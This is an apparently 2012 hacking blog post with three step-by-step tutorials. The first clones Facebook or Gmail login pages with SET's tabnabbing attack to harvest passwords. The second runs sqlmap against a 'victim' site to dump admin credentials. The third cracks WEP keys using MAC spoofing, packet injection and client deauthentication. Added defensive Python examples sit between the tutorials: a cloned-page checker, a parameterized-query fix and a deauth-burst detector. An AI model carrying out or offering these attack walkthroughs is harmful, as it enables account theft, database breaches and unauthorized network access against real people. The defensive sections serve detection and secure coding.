Tuesday, July 31, 2012

Hack facebook and Gmail using Backtrack 5

I am going to show you how to hack a facebook account using Backtrack 5. Just follow these simple steps.

1. Open your Backtrack 5 terminal and type cd /pentest/exploits/set
[screenshot: backtrack5 1]

2. Now open the Social-Engineering Toolkit (SET) with ./set
[screenshot: backtrack5 2]

3. Hit ENTER and SET will open. Select the 1st option (1 Social-Engineering Attacks) and hit ENTER, then select the 2nd option (type 2, as shown in the screenshot).
[screenshot: backtrack5 3]

4. Select the 4th option, "Tabnabbing Attack Method", and hit ENTER.
[screenshot: backtrack5 4]

5. Select the 2nd option, "Site Cloner", and hit ENTER.
[screenshot: backtrack5 5]

6. Here you need to enter the URL of Facebook (if you want to hack Gmail, enter Gmail's URL instead).
[screenshot: backtrack5 6]

7. Now hit ENTER.
[screenshot: backtrack5 6]

8. Open a new terminal, type ifconfig and hit ENTER.
[screenshot: backtrack5 9]

9. Copy this IP address and open it in a browser.
[screenshot: backtrack5 7]

10. Here I am just typing a test email and password to see whether it works or not.
[screenshot: backtrack5 8]

11. Hit ENTER and switch back to our terminal, and we find the email and password!
[screenshot: backtrack5 10]

This tutorial is for educational purposes only.
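
What the victim actually sees in the walkthrough above is a login page served from a bare LAN IP over plain HTTP, with a title that claims to be Facebook. Those are exactly the signals a browser extension, proxy or awareness tool can check for. The following is an added example, not code from the original post or from SET: a small Python checker that parses a page containing a password field and reports the indicators a cloned login page tends to carry (no HTTPS, host is an IP address rather than a domain, form posting to a different host, brand name in the title that does not match the host). The sample pages, the URL http://192.168.1.5/ and the brand-to-domain map are constructed for the example.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin


class _FormFinder(HTMLParser):
    """Collect <form action> targets, the <title> text and whether a password field exists."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password = False
        self.title = ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None, hence the `or ""` guards below
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def assess_login_page(page_url, html, expected_hosts):
    """Return a list of warning strings for a page that asks for a password.

    expected_hosts maps a brand keyword (as it would appear in the <title>)
    to the domain the genuine login page lives on. Pages without a password
    field produce no findings."""
    parsed = urlparse(page_url)
    host = parsed.hostname or ""
    findings = []
    finder = _FormFinder()
    finder.feed(html)
    if not finder.has_password:
        return findings
    if parsed.scheme != "https":
        findings.append("password form served over plain HTTP")
    try:
        ipaddress.ip_address(host)
        findings.append("host is a bare IP address, not a domain name")
    except ValueError:
        pass  # a hostname, not an IP literal
    for action in finder.actions:
        target = urlparse(urljoin(page_url, action))
        if target.hostname and target.hostname != host:
            findings.append(f"form posts to a different host: {target.hostname}")
    title = finder.title.lower()
    for brand, real_host in expected_hosts.items():
        if brand in title and not (host == real_host or host.endswith("." + real_host)):
            findings.append(f"title mentions {brand!r} but host {host!r} is not under {real_host}")
    return findings


# Constructed samples: a cloned page on a LAN IP, and a legitimate-looking one.
EXPECTED_HOSTS = {"facebook": "facebook.com", "gmail": "google.com"}
CLONE_URL = "http://192.168.1.5/"
CLONE_HTML = """<html><head><title>Welcome to Facebook</title></head>
<body><form action="/login" method="post">
<input type="text" name="email"><input type="password" name="pass">
<input type="submit" value="Log In"></form></body></html>"""
REAL_URL = "https://www.facebook.com/login"
REAL_HTML = """<html><head><title>Log in to Facebook</title></head>
<body><form action="/login/device-based/regular/login/" method="post">
<input type="text" name="email"><input type="password" name="pass">
<input type="submit" value="Log In"></form></body></html>"""

if __name__ == "__main__":
    for url, html in ((CLONE_URL, CLONE_HTML), (REAL_URL, REAL_HTML)):
        print(url, assess_login_page(url, html, EXPECTED_HOSTS) or ["no findings"])
```

The clone trips three of the four checks; the form-action check stays quiet because a site cloner posts the credentials back to the same host it serves from, which is why the host and scheme checks matter more than the action check on their own.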

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat is not a fully automated tool, one of those we call "one click ownage". You are the driving force behind this tool. Once you understand how this tool works, you will be able to exploit much more difficult SQL injections easily. Consider this tool an automation tool/front-end for manual blind SQL injections.





Hack website using Backtrack

I am going to show you how to hack a website using Backtrack 5 (sqlmap). Sqlmap is an automatic SQL injection tool which helps you hack a website easily. Follow these simple steps to hack a website with the Backtrack 5 sqlmap tool.

1. Open your Backtrack terminal, type cd /pentest/database/sqlmap and hit ENTER. Now sqlmap is open in your terminal.
[screenshot: sql map 1]

2. Now find the vulnerable site. (Well, I already have a vulnerable site.)
[screenshot: sql map 2]

3. Now type this command in the terminal and hit ENTER (refer to the figure above).

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs

4. Now you will get the database names of the website.
[screenshot: sql map 3]

Well, I got two databases, aj and information_schema; we will select the aj database.

5. Now get the tables of that database. For that you need to enter this command into your terminal and simply hit ENTER.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables

6. Now we need to grab the tables from the aj database. Paste the command below and hit ENTER.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj --tables
[screenshot: sql map 4]

7. Now you will get the list of tables stored in the aj database.
[screenshot: sql map 5]

8. Now let's grab the columns from the admin table.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
[screenshot: sql map 7]

Now we got the columns, and we got username and password.

9. Now let's grab the passwords of the admin.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website!
[screenshot: sql map 9]
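
Everything sqlmap does in the steps above rests on one server-side mistake: the id parameter from index.php?id=4 is concatenated into the query text. The following is an added example, not code from the original post or from sqlmap, showing that mistake next to its fix in Python with sqlite3. The admin table, its rows and the tampered input "4 OR 1=1" are constructed for the example; the names lookup_vulnerable, lookup_bound and lookup_validated are the example's own. The bound version shows that parameter binding on its own already stops the parameter from being parsed as SQL; the validated version adds the type check a numeric id should have anyway.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's 'aj' database and its admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?)",
        [(1, "alice", "hash1"), (4, "bob", "hash4"), (7, "carol", "hash7")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern behind index.php?id=4: the request parameter is pasted into the SQL text."""
    sql = f"SELECT username FROM admin WHERE id = {user_id} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, user_id):
    """Parameter binding alone: the value travels as data and is never parsed as SQL."""
    rows = conn.execute("SELECT username FROM admin WHERE id = ? ORDER BY id", (user_id,))
    return [row[0] for row in rows]


def lookup_validated(conn, user_id):
    """Binding plus type validation: anything that is not an integer is rejected up front."""
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return lookup_bound(conn, numeric_id)


def run_demo():
    """Run all three lookups against a normal id and a tampered one; return the outcomes."""
    conn = make_db()
    normal, tampered = "4", "4 OR 1=1"  # constructed inputs
    try:
        lookup_validated(conn, tampered)
        validated_rejected = False
    except ValueError:
        validated_rejected = True
    return {
        "vulnerable_normal": lookup_vulnerable(conn, normal),
        "vulnerable_tampered": lookup_vulnerable(conn, tampered),  # every row comes back
        "bound_normal": lookup_bound(conn, normal),
        "bound_tampered": lookup_bound(conn, tampered),  # text never matches an integer id
        "validated_normal": lookup_validated(conn, normal),
        "validated_rejected": validated_rejected,
    }


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

The tampered input returns all three usernames from the vulnerable query, nothing from the bound query, and a ValueError from the validated one; the same difference is what separates a site that sqlmap can enumerate from one it cannot.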

How to crack WEP with BackTrack 5

1.) Start monitor mode:

airmon-ng

Copy down interface

airmon-ng start (interface)

If it says "mon0" or "wifi0" is in use, this is your new interface

If it says other processes are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your target's BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This lets you test a specific AP, which can be useful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface(s))

ifconfig (interface) down

macchanger --mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating clients' MACs under Station

If found & step 6 isn’t going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

A minimum of around 10,000 to 20,000 IVs is needed to crack a 64-bit key & about 40,000 to 85,000 for a 128-bit key

Try "aircrack-ng -n 64 (dump-name)*cap" every 10,000 IVs

If you know the start of the key in hexadecimal, try running "-d #" where # is the known starting characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

Retry with the fudge factor increased by 4 more if that's unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

* Other attack methods:

Injection attack with 2 wireless cards:

aireplay-ng -9 -i (receiving interface) (injecting interface)

If it fails on Attack -5, make sure the injection interface MAC matches the current card MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know the MAC of an authenticated client who is online

This will disconnect the authenticated client, so they may become suspicious...
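
The deauthentication step is the noisy part of this whole procedure: a burst of deauth frames carrying the AP's address, all within a second or two, is not something a healthy network produces, and it is what a wireless IDS keys on. The following is an added example, not code from the original post or from the aircrack-ng suite: a Python sliding-window detector that reads one-frame-per-line management-frame logs and alerts when a single source emits a burst of deauth or disassoc frames. The log line format, the timestamps, the MAC addresses and the default thresholds (5 frames within 2 seconds) are constructed for the example; a real deployment would feed it from a monitor-mode capture and tune the threshold to the site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed line format: "<date> <time> <frame-type> src=<mac> dst=<mac> [reason=<n>]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<type>\w+) src=(?P<src>[0-9a-f:]{17}) "
    r"dst=(?P<dst>[0-9a-f:]{17})(?: reason=(?P<reason>\d+))?$"
)


def parse_frame_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    frame = m.groupdict()
    frame["ts"] = datetime.strptime(frame["ts"], "%Y-%m-%d %H:%M:%S.%f")
    return frame


def detect_deauth_bursts(lines, threshold=5, window_s=2.0):
    """Return (src, first_ts, count) alerts when one source sends >= threshold
    deauth/disassoc frames inside a window of window_s seconds.

    One alert per source: once a source has been flagged, later frames from it
    are counted but do not re-alert, so a sustained flood yields one record."""
    recent = defaultdict(deque)  # src -> timestamps of its frames still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        frame = parse_frame_line(line)
        if frame is None or frame["type"] not in ("deauth", "disassoc"):
            continue
        window = recent[frame["src"]]
        window.append(frame["ts"])
        while (frame["ts"] - window[0]).total_seconds() > window_s:
            window.popleft()  # drop frames that have aged out of the window
        if len(window) >= threshold and frame["src"] not in alerted:
            alerted.add(frame["src"])
            alerts.append((frame["src"], window[0], len(window)))
    return alerts


# Constructed sample: a beacon, a data frame, six deauths from the AP address
# to broadcast in under a second, then one ordinary client-initiated deauth.
SAMPLE_LOG = """\
2012-07-31 10:00:00.000 beacon src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
2012-07-31 10:00:00.100 deauth src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff reason=7
2012-07-31 10:00:00.200 deauth src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff reason=7
2012-07-31 10:00:00.300 data src=aa:bb:cc:dd:ee:01 dst=00:11:22:33:44:55
2012-07-31 10:00:00.400 deauth src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff reason=7
2012-07-31 10:00:00.500 deauth src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff reason=7
2012-07-31 10:00:00.600 deauth src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff reason=7
2012-07-31 10:00:00.700 deauth src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff reason=7
2012-07-31 10:00:05.000 deauth src=aa:bb:cc:dd:ee:02 dst=00:11:22:33:44:55 reason=3
"""

if __name__ == "__main__":
    for src, first_seen, count in detect_deauth_bursts(SAMPLE_LOG.splitlines()):
        print(f"deauth burst from {src}: {count} frames starting {first_seen.time()}")
```

The lone client deauth at the end never reaches the threshold and is not reported, which is the point of windowing rather than counting: a single disconnect is normal, a burst is not.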